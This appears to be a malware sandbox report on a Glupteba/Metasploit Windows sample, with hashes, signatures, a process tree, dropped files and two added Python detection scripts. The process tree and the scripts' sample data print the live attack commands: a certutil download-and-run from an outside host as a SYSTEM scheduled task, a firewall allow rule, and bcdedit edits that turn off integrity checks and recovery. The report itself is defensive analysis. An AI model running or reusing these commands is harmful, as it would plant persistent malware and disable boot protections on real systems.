Analysis

  • max time kernel
    0s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    22/01/2024, 17:10

General

  • Target

    6fd9d52463f7b9444ae84fccccc96a3b.exe

  • Size

    4.4MB

  • MD5

    6fd9d52463f7b9444ae84fccccc96a3b

  • SHA1

    d4fc7b50057f1e4df7527df00cde8a4b7556498d

  • SHA256

    7bec73f4ea2b19439f13212e476245d88a0cf3da3a90cb27d684614e0a5affef

  • SHA512

    f166b7030e21f2ca4db3c8d6fd030eb9ea85a9e9591a75fc1a22302cad87e2cc6c7880b0af19f1b292d157623f878f98af11283ec9a33d3d77ac517dd4f1e5e2

  • SSDEEP

    98304:pYjdJmh/+mi/Tlmp1pU7mGMDLGUvlm96nZnEV0nhktE22YRzwbW/z6RtwJ:47mhWmuwp1wMDyl6ZnEOhktEKRzr+/wJ

Malware Config

Extracted

  • Family
    metasploit
  • Version
    windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload (18 IoCs)
  • Metasploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies boot configuration data using bcdedit (1 TTP, 14 IoCs)
  • Modifies Windows Firewall (1 TTP, 1 IoC)
  • Possible attempt to disable PatchGuard (2 TTPs)

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Creates scheduled task(s) (1 TTP, 2 IoCs)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent (3 IoCs)

    Uses default user-agent string defined by GoLang HTTP packages.
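
The bcdedit and PatchGuard signatures above correspond to the boot-entry tampering visible in the process tree: the sample creates a second OS loader entry ("Windows Fast Mode"), points it at its own ntkrnlmp.exe and osloader.exe, sets nointegritychecks 1 and recoveryenabled 0, makes it the default and sets the boot menu timeout to 0. The following Python script is an added example, not part of the sandbox report: it parses a `bcdedit /enum all /v` dump and flags loader entries with those properties, which is the check an incident responder wants to run on a suspected host. The dump it runs against is constructed here from this report's bcdedit commands plus a clean Windows 7 entry; the GUID of that clean entry is made up, and the list of expected loader file names is the example's own heuristic.

```python
"""Audit a `bcdedit /enum all /v` dump for tampered OS loader entries."""
from typing import Dict, List

# Constructed sample of `bcdedit /enum all /v` output. The second loader
# entry is assembled from the bcdedit commands in this report; the GUID of
# the clean "Windows 7" entry is invented for the example.
SAMPLE_BCD = """\
Windows Boot Manager
--------------------
identifier              {9dea862c-5cdd-4e70-acc1-f32b344d4795}
device                  partition=\\Device\\HarddiskVolume1
description             Windows Boot Manager
default                 {71a3c7fc-f751-4982-aec1-e958357e6813}
displayorder            {3f2c5b4e-0000-4a1b-9c2d-111111111111}
                        {71a3c7fc-f751-4982-aec1-e958357e6813}
timeout                 0

Windows Boot Loader
-------------------
identifier              {3f2c5b4e-0000-4a1b-9c2d-111111111111}
device                  partition=C:
path                    \\Windows\\system32\\winload.exe
description             Windows 7
inherit                 {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \\Windows
nx                      OptIn

Windows Boot Loader
-------------------
identifier              {71a3c7fc-f751-4982-aec1-e958357e6813}
device                  partition=C:
path                    \\Windows\\system32\\osloader.exe
description             Windows Fast Mode
inherit                 {6efb52bf-1766-41db-a6b3-0ee5eff72bd7}
recoveryenabled         No
nointegritychecks       Yes
osdevice                partition=C:
systemroot              \\Windows
kernel                  ntkrnlmp.exe
nx                      OptIn
"""

# Loader images a stock Windows install points at (example's own list).
_EXPECTED_LOADERS = ("winload.exe", "winload.efi")


def parse_bcd(text: str) -> List[Dict[str, List[str]]]:
    """Split bcdedit output into entries: dict of lowercased key -> values.
    Multi-valued keys such as displayorder continue on indented lines."""
    entries, current, last_key = [], None, None
    for line in text.splitlines():
        if not line.strip():                  # blank line ends an entry
            current, last_key = None, None
            continue
        if set(line.strip()) == {"-"}:        # underline below the title
            continue
        if current is None:                   # title, e.g. "Windows Boot Loader"
            current = {"_type": [line.strip()]}
            entries.append(current)
            continue
        if line[0].isspace() and last_key:    # continuation of previous key
            current[last_key].append(line.strip())
            continue
        key, _, value = line.partition(" ")
        last_key = key.lower()
        current.setdefault(last_key, []).append(value.strip())
    return entries


def audit_bcd(text: str) -> Dict[str, List[str]]:
    """Return {identifier: [issues]} for every loader entry that looks tampered."""
    entries = parse_bcd(text)
    mgr = next((e for e in entries if e["_type"][0] == "Windows Boot Manager"), {})
    default = mgr.get("default", [""])[0].lower()
    timeout = mgr.get("timeout", [""])[0]
    flagged = {}
    for e in entries:
        if e["_type"][0] != "Windows Boot Loader":
            continue
        ident = e.get("identifier", ["?"])[0].lower()
        issues = []
        if e.get("nointegritychecks", ["No"])[0] == "Yes":
            issues.append("nointegritychecks=Yes (kernel-mode code signing not enforced)")
        if e.get("testsigning", ["No"])[0] == "Yes":
            issues.append("testsigning=Yes")
        if e.get("recoveryenabled", ["Yes"])[0] == "No":
            issues.append("recoveryenabled=No (Windows Recovery disabled)")
        path = e.get("path", [""])[0].lower()
        if path and not path.endswith(_EXPECTED_LOADERS):
            issues.append(f"non-standard OS loader path {path}")
        if "kernel" in e:
            issues.append(f"custom kernel image {e['kernel'][0]}")
        if issues and ident == default:       # tampered entry is what boots
            issues.append("entry is the boot manager default"
                          + (" and the boot menu timeout is 0" if timeout == "0" else ""))
        if issues:
            flagged[ident] = issues
    return flagged


if __name__ == "__main__":
    for ident, issues in audit_bcd(SAMPLE_BCD).items():
        print(ident)
        for issue in issues:
            print("  -", issue)
```

On a live host, feed the script the output of `bcdedit /enum all /v` from an elevated prompt; with `/v` the well-known aliases such as {bootloadersettings} are shown as GUIDs, which is what the parser expects. Note that nointegritychecks and testsigning only have effect where Secure Boot is not enforcing, which is the case on the Windows 7 target used in this analysis.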

Processes

  • C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
    "C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
    1⤵
      PID:1668
      • C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
        "C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"
        2⤵
          PID:2624
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            3⤵
              PID:2588
            • C:\Windows\rss\csrss.exe
              C:\Windows\rss\csrss.exe ""
              3⤵
                PID:3000
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  4⤵
                  • Creates scheduled task(s)
                  PID:2692
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
                  4⤵
                  • Creates scheduled task(s)
                  PID:376
                • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                  "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                  4⤵
                    PID:1868
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2872
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2900
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2868
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1424
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:792
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:604
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1756
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2628
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2220
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2228
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2332
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2540
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      5⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2152
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    4⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1736
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    4⤵
                      PID:912
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      4⤵
                        PID:1968
                • C:\Windows\system32\makecab.exe
                  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240122171030.log C:\Windows\Logs\CBS\CbsPersist_20240122171030.cab
                  1⤵
                    PID:2724
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                    1⤵
                    • Modifies Windows Firewall
                    PID:2632
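
The process tree above is the useful part of this report for detection engineering: the persistence (schtasks at logon with highest privileges), the download stage (certutil -urlcache), the firewall rule, the boot-configuration tampering and the csrss.exe masquerade under C:\Windows\rss all surface as child command lines. The following Python script is an added example, not part of the sandbox report: it runs a small rule set over those command lines and maps each hit to the ATT&CK technique it evidences. The command lines are copied from the tree; the rule names, regexes and technique mapping are the example's own.

```python
"""Rule-based triage of the child command lines in this sample's process tree."""
import re
from dataclasses import dataclass
from typing import List, Tuple

# Command lines copied from the sandbox process tree above.
SAMPLE_CMDLINES = [
    r'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0',
    r'C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe',
    r'C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER',
    r'C:\Windows\Sysnative\bcdedit.exe /v',  # read-only enumeration: must not fire
    r'C:\Windows\rss\csrss.exe ""',
]


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str        # ATT&CK technique ID the behaviour evidences
    pattern: "re.Pattern"


def _rule(name: str, technique: str, regex: str) -> Rule:
    return Rule(name, technique, re.compile(regex, re.IGNORECASE | re.DOTALL))


RULES = [
    _rule("bcdedit disables code-integrity checks", "T1553.006",
          r"bcdedit(\.exe)?\b.*\b(nointegritychecks|testsigning)\s+(1|on|yes)\b"),
    _rule("bcdedit disables Windows recovery", "T1490",
          r"bcdedit(\.exe)?\b.*\brecoveryenabled\s+(0|off|no)\b"),
    _rule("bcdedit overrides the kernel or OS loader image", "T1014",
          r"bcdedit(\.exe)?\b.*\s(kernel|path)\s+\S+"),
    _rule("bcdedit creates a new OS loader entry", "T1542",
          r"bcdedit(\.exe)?\b.*\s-create\s+\{[0-9a-f-]+\}.*-application\s+osloader"),
    _rule("scheduled task at logon with highest privileges", "T1053.005",
          r"schtasks\b.*/CREATE\b.*/SC\s+ONLOGON\b.*/RL\s+HIGHEST\b"),
    _rule("certutil used to download a remote file", "T1105",
          r"certutil(\.exe)?\s+-urlcache\b.*\s-f\s+https?://"),
    _rule("firewall allow rule added for a program", "T1562.004",
          r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b.*\baction=allow\b"),
]

# The genuine csrss.exe lives in System32; any other csrss.exe path is a masquerade.
_CSRSS_PATH = re.compile(r"[a-z]:\\[^\s\"]+\\csrss\.exe", re.IGNORECASE)
_LEGIT_CSRSS = r"c:\windows\system32\csrss.exe"


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str
    cmdline: str


def masquerading_paths(cmdline: str) -> List[str]:
    """Return every csrss.exe path in the command line that is not the System32 one."""
    return [p for p in _CSRSS_PATH.findall(cmdline) if p.lower() != _LEGIT_CSRSS]


def classify(cmdline: str) -> List[Finding]:
    """All rule hits for one command line, plus the masquerade check."""
    findings = [Finding(r.name, r.technique, cmdline) for r in RULES if r.pattern.search(cmdline)]
    for path in masquerading_paths(cmdline):
        findings.append(Finding(f"system binary name outside System32: {path}", "T1036.005", cmdline))
    return findings


def triage(cmdlines: List[str]) -> Tuple[List[Finding], List[str]]:
    """Run every rule over every command line; return the findings and the
    sorted set of techniques they evidence."""
    findings = [f for c in cmdlines for f in classify(c)]
    return findings, sorted({f.technique for f in findings})


if __name__ == "__main__":
    findings, techniques = triage(SAMPLE_CMDLINES)
    for f in findings:
        print(f"[{f.technique}] {f.rule}\n    {f.cmdline[:100]}")
    print("techniques:", ", ".join(techniques))
```

The read-only `bcdedit /v` enumeration deliberately produces no finding, so the rules stay usable against process-creation telemetry (Sysmon event 1 or Windows 4688) where administrators also run bcdedit. The `-set ... kernel` and `-set ... path` rules are the ones worth keeping even if the rest look noisy in your environment: a loader entry pointing at a kernel or OS loader image other than the stock winload.exe is rare outside of this kind of tampering.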

                  Network

                        MITRE ATT&CK Enterprise v15

                        Downloads

                        • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

                          Filesize

                          64KB

                          MD5

                          c9b01a86e63bca4272d6629df216a696

                          SHA1

                          0c1a515ca60ca432e7163ec59e9cbb93d12cf84e

                          SHA256

                          12e7e556c8c534b4b9e3a772ec266e48b15f92461fb68d8c75a7bc062b21519d

                          SHA512

                          7872033f755cb77fd7d46a02b6424ce3deebc9163b4841dafbb0dc42ee5f4246ca574109bcd9c458bddeaab924b2dfc6d447ca3ea102eb86d040a76041188295

                        • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

                          Filesize

                          55KB

                          MD5

                          32fd525da503cb69f7f1629ee58d2e32

                          SHA1

                          fa3a87ed98b0e048a63fa59652c2d71f7f82187f

                          SHA256

                          239be51515c362328aefa4bef8dc4b0f16ada5d10bc41ced0a64093173d60be5

                          SHA512

                          5864560a9a9adec4b48eaa28edfbb2efd00eaa704fe5cc5c4b2431e718bf88f1e7d331756cc09e125bd07a4b4f3b32abbf847082c2867373369c72a9bbce51ff

                        • C:\Users\Admin\AppData\Local\Temp\Tar2119.tmp

                          Filesize

                          171KB

                          MD5

                          9c0c641c06238516f27941aa1166d427

                          SHA1

                          64cd549fb8cf014fcd9312aa7a5b023847b6c977

                          SHA256

                          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

                          SHA512

                          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

                        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

                          Filesize

                          94KB

                          MD5

                          d98e78fd57db58a11f880b45bb659767

                          SHA1

                          ab70c0d3bd9103c07632eeecee9f51d198ed0e76

                          SHA256

                          414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

                          SHA512

                          aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

                        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                          Filesize

                          28KB

                          MD5

                          15294aac39d43bdadb3cbe422a656a77

                          SHA1

                          debb2fb31abff11aaf7ad03010c133628a345e70

                          SHA256

                          ec9a6e9b9f4933bebacb3eb8824f94f04024e09ac3e408614d48f301fef6cf8f

                          SHA512

                          dd2f31fa0039609068bc2b1086fc82944969d02f14d16d231a0aa06b9dae4dabc0414610541976c6e47d7d552664a024f51e096a08b04e708898d72743dfbde3

                        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

                          Filesize

                          163KB

                          MD5

                          cb70c7f3923cb7fe161c13e3465b7a5d

                          SHA1

                          f96d862b9d1a8f5779fcc9dba83b66988a8a5a55

                          SHA256

                          d157a3ad1f1e6a780830ca318f58e753c8dccc26d3f173f621b1bbd61c658ea6

                          SHA512

                          9fc5e05123db47c51571a93abafb84a80119a7d512416b94ed2190bc717617f89a54fc614db85f01b714686670969e800dc9cd8d0fff594130cf42a247ff7bdb

                        • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          64KB

                          MD5

                          03e03703fe5fc79e7f1d5e44e3c27b1e

                          SHA1

                          8f25ba10b5e479ae63c4c3867475502e1a6499fa

                          SHA256

                          504111bf8fb1386663a5f92bab46dc7b1171fb9c9a8b8cd100945a6c6bde311e

                          SHA512

                          1926c83c1f301800c289b16458ae30bc0927b231a5b11b12663d8a608c5ded27d8d73987ec6af46011e2f2b4e7e4c65fa7cfd50e5370d00e47784982874b88fa

                        • C:\Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          39KB

                          MD5

                          435bdbda10a0eaeac0e7d33781be1837

                          SHA1

                          cdc07e5c82990eecb1f1de5f8d97ffe9cb908cdb

                          SHA256

                          9f0a2d4f0150f4c40d9a074e0bcd06d1db3e2bc5b5515e7783904d4b042450e4

                          SHA512

                          416990e39a3726596bd7dd3bb70cbc9b08c47bd48d2e621c70616cc09a1fc556b9d41eb325dcc54cee1a1fb8d2affcf1aa2032f50db3bbb6db6a7634d487de8c

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                          Filesize

                          65KB

                          MD5

                          ac05d27423a85adc1622c714f2cb6184

                          SHA1

                          b0fe2b1abddb97837ea0195be70ab2ff14d43198

                          SHA256

                          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

                          SHA512

                          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

                          Filesize

                          893B

                          MD5

                          d4ae187b4574036c2d76b6df8a8c1a30

                          SHA1

                          b06f409fa14bab33cbaf4a37811b8740b624d9e5

                          SHA256

                          a2ce3a0fa7d2a833d1801e01ec48e35b70d84f3467cc9f8fab370386e13879c7

                          SHA512

                          1f44a360e8bb8ada22bc5bfe001f1babb4e72005a46bc2a94c33c4bd149ff256cce6f35d65ca4f7fc2a5b9e15494155449830d2809c8cf218d0b9196ec646b0c

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                          Filesize

                          1KB

                          MD5

                          a266bb7dcc38a562631361bbf61dd11b

                          SHA1

                          3b1efd3a66ea28b16697394703a72ca340a05bd5

                          SHA256

                          df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                          SHA512

                          0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                          Filesize

                          344B

                          MD5

                          44e942e56ad71912f4cdbdff8dbb983e

                          SHA1

                          2e3c9c018527b8e5f98e333d91bc26386c0dfc0e

                          SHA256

                          ccf4e6a578d687272a02dc32fba92e3c65e2b481974b9b8a3a0c3c03be8a0e14

                          SHA512

                          ea428a0dd1263ff64e9d6422ea632833cf67e064827a9438e217c4b1b2226789447a98bd6bf591ee929426a937bdfeb4c70eadbebf348afa265a39df9f89628f

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                          Filesize

                          344B

                          MD5

                          d562af68231088c295a5b09de3cbcb39

                          SHA1

                          5944cd71d6f21bae4a9319d1aa404689f37eccc9

                          SHA256

                          2cee86596ef577012a627e8dcade8ce31fb7629a26860e7b4a515d5448cfec2c

                          SHA512

                          8ac91cab45784733013c4689377d620a575c2f0862b78bf3cafe65d8f91ebab16483335ba7c620142055e812d62549b845c16038a14f9b35487f2dd76dd7649a

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                          Filesize

                          344B

                          MD5

                          0d1d181084a526819f4dc38f2c911737

                          SHA1

                          ccde1f0aab4c945b6877819a48a047b11b33f4e0

                          SHA256

                          ad66c0d0561f38e3022fdc7c6f6bf4192b2c21f95b9451dcb309523255a0de0c

                          SHA512

                          0d301c376d076ed7f69b4fc5e3c6841f4626ff347a811d69a657b22a042b45b65fdad17ec2ead2a774e8004f26ebcd24e822aed78614c2a37517a758433837cc

                        • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                          Filesize

                          242B

                          MD5

                          3c1815ec1c06f8acd9081d59420400a1

                          SHA1

                          f439cb394e9d3abc15d2ae48fc07eac858603a24

                          SHA256

                          acad7cb2cabbb86e6fa636522c9b8c979e30b0d8238f246412bf2a734cac5ea5

                          SHA512

                          d99669c8d2fa2a37cd50768db21b07cd1b4659dabf94e3956fb44c74d885f49139654bbdaba571c7f3154f79536b90607ba597c073652ec361aa9802ed7a3789

                        • C:\Windows\rss\csrss.exe

                          Filesize

                          634KB

                          MD5

                          5fc8eddd8c87b4be855b21f7015109c5

                          SHA1

                          1b2b802c289f770d16b4678d648630ee48f1384a

                          SHA256

                          530f26a68f4d28df80848c88bf421171a3b42f883e2f7adee89a2682b74d3ae1

                          SHA512

                          4431adb2d4fabdf349d94c82cb331cfe74a4498d6aec5955057a989c4f0320970da151d31422e7bd11d0c834ce46aaccdf3c0291005915d26392557475470cec

                        • C:\Windows\rss\csrss.exe

                          Filesize

                          852KB

                          MD5

                          b00ed00494ee57e6c52e15350a87642d

                          SHA1

                          670ea4ca841bb15c49c75a13f87dcab906a3523d

                          SHA256

                          b74e8efc5f5083292415fe25813ea0e32206b24f25003646ddbabb25a9c12114

                          SHA512

                          a8c9c8dd39bbf5c27d1f5f4895e3084c6a619a6243d09af56e12ffdc997b5c2783c670b88512f21c9bc61f01428473d4b15ac57870f6d3f88f431ac487c191b6

                        • C:\Windows\rss\csrss.exe

                          Filesize

                          301KB

                          MD5

                          8c3add78367cbbcfc0e469398610b0ab

                          SHA1

                          ee8b434d96bb2af3846fd18b46676113a942da92

                          SHA256

                          47656a063da9c5c670f02ae9e2ea77710e68408e041d3d1f58e7fb0f6491ec4e

                          SHA512

                          5d30d97d3a3213c0d1f83d5afe2b25e9a22cfd3653e6647eafc8749be13302dfb9ae00fb295bb272fd687ff8690de1676d673b1d51b201556058da7651b17334

                        • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                          Filesize

                          17KB

                          MD5

                          034bccff31f9b5930b1a405d88bbc79e

                          SHA1

                          e9aaba0aa4e00562a2a68316109001274b844003

                          SHA256

                          fc26c36ff97f9a5d0d8a925c72cb963123d3013a69eab9086b40afeffa1fb622

                          SHA512

                          6994168753129e4a1a5d52d762fc2a5c1b041d013b9620f63f76198dc9bc927056c5b8d25ecdbb680e4a82cf9d6ed83de264223d365f898d57ae139a1c3208ab

                        • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

                          Filesize

                          215KB

                          MD5

                          2b3fb437d2aa195969805824a421e698

                          SHA1

                          191321a74c1c114180a249f8fb0f0001a0f40909

                          SHA256

                          2bc9e33c524cfd1d51589932721a0cec3fde6f09bb7939d4cd8cb17633b2eb9a

                          SHA512

                          bb98943cf012f04132c4f05b2f39a7260ad9ac4bedd44032970098a7e30fc101f5c188c136ea6c3c4c0feda62d42055885d5dbcfb047c5cd64687d14bf1cd546

                        • \Users\Admin\AppData\Local\Temp\dbghelp.dll

                          Filesize

                          77KB

                          MD5

                          ec95ca03114bfe923aac5eee16bf6a3f

                          SHA1

                          83e872e217104770876cba544b6a2c9a3c8f8455

                          SHA256

                          03173ddc1f16447a6f52e9a6858e952cec07bdcee4b922be071a837939af173e

                          SHA512

                          78ccc66935bd7451e2136cb960390ad961c8f08e125410b555bcf20357c71f466f94100803103d6d950062e27ef429569f1c588778d61120f532fe793246031c

                        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          140KB

                          MD5

                          9e283d09b2dfb3bbdad30ec5fda4d7fb

                          SHA1

                          fe357fab7abd3e938025bfe660ce704c34778251

                          SHA256

                          8f85a21bc4144c28f03499568f81ba153be9fdce158251d6d21bd4a6c37b2f8f

                          SHA512

                          54f149b392eaa4990f3b5809835583d60fc988da41c0c37941a442d1438dde4c8ce4e5ab99d7fca785a081c499d0090c7b3ff4d6e89712a9fb0b045e908062ae

                        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          157KB

                          MD5

                          924095796173147e9bcab57734f24b20

                          SHA1

                          0acedbff078dc3e7745dfa6088893364547f7721

                          SHA256

                          9de62ba25d6d333413ef942de6b23681d477e516f0d5bfecda89ef867bbe1e25

                          SHA512

                          c9cd8734df658ea571628c47262dba4a56a7ec8c15eeed5c26d9144a4b78a98e5ca67e49d3083f90e6c9672621e22017aa9746672ba3b574a5080d701a1d247b

                        • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

                          Filesize

                          110KB

                          MD5

                          76353b3230a8d5f0edb8236f39be76ac

                          SHA1

                          0366d61ae5400da73ee94e382c92ff4f0f6c0336

                          SHA256

                          8fee315c8e4a0116d4d17a6eda2481a6c7e4384a7f2e38dab8218d38d2390e84

                          SHA512

                          186a4a1948fd788b058631b57a548b769d5fb2bbfda0ac965b8fd9e0e788137d81ceed1dabb383f871c640c48a842e23b1c5c4e0b95e8be92e91826980276539

                        • \Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          72KB

                          MD5

                          d97ea8f8b9f71bbbe784f5b118178a45

                          SHA1

                          823784b6701dcfdb65a933c181759993d8a114c1

                          SHA256

                          3bd5cbd6f7af5f903656bfd4b6c3a1a11d111480bf1ae58373df7b85705602d5

                          SHA512

                          9a9f67ca22bd9fa1b6ee60f0bf1d033aaeb71d3c85e2ead77e79d71e011a22ea26555177e69e1ba36a1cdf9e3eb9836d69590603c6947f716e46b87910f5d5ec

                        • \Users\Admin\AppData\Local\Temp\osloader.exe

                          Filesize

                          1KB

                          MD5

